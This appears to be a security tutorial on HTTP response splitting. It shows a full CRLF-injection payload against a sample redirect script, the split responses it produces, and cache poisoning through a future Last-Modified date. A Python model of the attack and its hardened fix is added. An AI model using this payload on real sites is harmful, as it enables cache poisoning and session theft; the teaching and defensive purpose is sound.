HTTP Response Splitting

Popularity: 6
Simplicity: 4
Impact: 8
Risk Rating: 6

HTTP response splitting vulnerabilities arise when a web application fails to validate user-supplied input, specifically carriage return (CR, %0d) and line feed (LF, %0a) characters, before placing that input into a header of the HTTP response. Because CRLF terminates a header line and an empty line (CRLF CRLF) terminates the header block, an attacker who can inject these characters can end the legitimate response early and append a second, completely attacker-controlled response, enabling a variety of attacks.

Let's say the web application utilizes the following custom script to redirect users when they request certain pages:

http://10.1.1.9/redirect.php?file=welcome.php

When a user requests this page, the server replies with the following response:

HTTP/1.0 302 Found
Content-Type: text/html
Location: http://10.1.1.9/welcome.php
Server: Apache
Content-Length: 24

<html>Redirecting</html>

The value of the file parameter, welcome.php, has therefore been copied into the HTTP Location header of the web server response. By appending a URL-encoded CRLF (%0d%0a) to that value, we are able to start new lines and so create our own headers in the response; with two consecutive CRLFs we can terminate the header block and begin a second response. The following request (all on a single line) could be used to carry out HTTP response splitting against this web application:

http://10.1.1.9/redirect.php?file=welcome.php%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Fri,%2031%20Dec%202020%2023:59:59%20GMT%0d%0aContent-Length:%2028%0d%0a%0d%0a<html>Poisoned%20Page</html>

This request would result in the server sending back the following response:

HTTP/1.0 302 Found
Content-Type: text/html
Location: http://10.1.1.9/welcome.php
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Last-Modified: Fri, 31 Dec 2020 23:59:59 GMT
Content-Length: 28

<html>Poisoned Page</html>
Server: Apache
Content-Length: 24

<html>Redirecting</html>

The response has therefore been split into two responses based on our input to the file parameter passed to the redirect.php script. The first response is the 302 redirect with a Content-Length of 0, and the second response is the 200 OK response with a Content-Length of 28 consisting of the data <html>Poisoned Page</html>. The leftover data after the second response (the original Server and Content-Length headers and the Redirecting body) does not begin with a valid status line, so a client or proxy parsing the stream discards it.

So if the attacker now sends two requests back to back over the same persistent connection (for example, through a caching proxy), the first being the attack request just used and the second being a normal request to the login.php script, then the first response (302) will be matched up with our first attack request for welcome.php:

HTTP/1.0 302 Found
Content-Type: text/html
Location: http://10.1.1.9/welcome.php
Content-Length: 0

And the second response will be matched up with the request for login.php:

HTTP/1.0 200 OK
Content-Type: text/html
Last-Modified: Fri, 31 Dec 2020 23:59:59 GMT
Content-Length: 28

<html>Poisoned Page</html>
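The following Python script is an added example and is not code from the original page; it models the whole sequence described above so it can be run offline. A hypothetical build_redirect() stands in for the page's redirect.php and emits the 302 with the same header order; parse_responses() carves a byte stream into HTTP messages the way a naive pipelining client or shared cache would; pair_with_requests() shows the surplus 200 being matched to the next request (login.php); and hardened_redirect() is an assumed fix that rejects control characters and applies an allow-list before the value reaches a header. The attack string is the page's own, re-encoded; note that its Content-Length of 28 covers the 26-byte tag plus the CRLF after it, so the parsed body carries that trailing CRLF.

```python
"""HTTP response splitting, modelled end to end (added example)."""
import re
from urllib.parse import unquote

# Attack value for the page's `file` parameter, URL-encoded as it would
# travel on the query string (constructed to match the page's request).
ATTACK_PARAM = (
    "welcome.php%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Last-Modified:%20Fri,%2031%20Dec%202020%2023:59:59%20GMT%0d%0a"
    "Content-Length:%2028%0d%0a%0d%0a<html>Poisoned%20Page</html>"
)
REDIRECT_BODY = b"<html>Redirecting</html>"


def build_redirect(target: str) -> bytes:
    """Raw 302 response in the page's header order; `target` is already
    URL-decoded and goes straight into Location (hypothetical model)."""
    head = (
        "HTTP/1.0 302 Found\r\n"
        "Content-Type: text/html\r\n"
        f"Location: http://10.1.1.9/{target}\r\n"
        "Server: Apache\r\n"
        f"Content-Length: {len(REDIRECT_BODY)}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + REDIRECT_BODY


def vulnerable_redirect(file_param: str) -> bytes:
    """Model of the page's redirect.php: no filtering at all."""
    return build_redirect(unquote(file_param))


class HeaderInjection(ValueError):
    """Raised when a value bound for a response header is rejected."""


# Reject every control character, not only CR and LF: some proxies and
# clients also end a header line on a bare LF or a NUL, so stripping just
# "\r\n" leaves a hole.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# Allow-list for the redirect target itself (assumed policy: a bare file
# name, which also rules out "/" and therefore "../" and other hosts).
SAFE_TARGET = re.compile(r"^[A-Za-z0-9_.-]+$")


def hardened_redirect(file_param: str) -> bytes:
    """Same script with the value validated before it reaches a header."""
    target = unquote(file_param)
    if CONTROL_CHARS.search(target):
        raise HeaderInjection("control character in redirect target")
    if not SAFE_TARGET.match(target):
        raise HeaderInjection("redirect target outside the allow-list")
    return build_redirect(target)


def parse_responses(stream: bytes) -> list[dict]:
    """Carve a byte stream into HTTP messages the way a naive pipelining
    client or shared cache does: status line, headers up to the first blank
    line, then exactly Content-Length body bytes, repeated until the data
    runs out. Leftover bytes that do not start with a status line are
    dropped, which is the fate of the tail of the split response."""
    messages = []
    pos = 0
    while True:
        blank = stream.find(b"\r\n\r\n", pos)
        if blank == -1:
            break
        lines = stream[pos:blank].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break  # junk after the last complete message: discarded
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = blank + 4
        length = int(headers.get("content-length", "0"))
        messages.append({
            "status": lines[0],
            "headers": headers,
            "body": stream[body_start:body_start + length],
        })
        pos = body_start + length
    return messages


def pair_with_requests(requests: list[str], stream: bytes) -> dict:
    """Match responses to pipelined requests in order, as HTTP/1.x clients
    and caches must: the surplus 200 lands on whatever request came next."""
    return dict(zip(requests, parse_responses(stream)))


if __name__ == "__main__":
    pipeline = ["GET /redirect.php?file=" + ATTACK_PARAM, "GET /login.php"]
    paired = pair_with_requests(pipeline, vulnerable_redirect(ATTACK_PARAM))
    for req, msg in paired.items():
        print(f"{req[:40]:<40} -> {msg['status']} body={msg['body']!r}")
    try:
        hardened_redirect(ATTACK_PARAM)
    except HeaderInjection as exc:
        print("hardened script rejected the value:", exc)
```

Run it and the poisoned 200 is paired with GET /login.php while the hardened script refuses the attack value outright. Rejecting is preferable to stripping or percent-encoding the offending bytes: an encoded value still reaches the header and depends on every downstream parser agreeing on what it means, whereas a rejected request never produces a header at all.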

Setting the Last-Modified header of the poisoned page to a date in the future should cause most web caches to keep serving the poisoned content: when the cache later revalidates with an If-Modified-Since request carrying that future date, the origin server answers 304 Not Modified, and the genuine page never displaces the poisoned copy. The date must be in the future at the time of the attack; 31 Dec 2020 was chosen on that basis when this was written. Therefore, if web caches are used as a part of the organization's web infrastructure, any user requesting the login.php page would then be served the poisoned page.

The content of the poisoned page could have easily contained some malicious JavaScript code that captured session identifiers, cookies, and authentication credentials, leading to accounts within the web application being compromised.

This vulnerability can also enable similar attacks, such as web browser cache poisoning, cross-site scripting, and response hijacking. Response hijacking uses the same techniques to confuse the request/response sequence so that the attacker receives a server response that was destined for another user. This may leak sensitive information within that response, including session identifiers and cookies, again possibly leading to accounts being compromised.
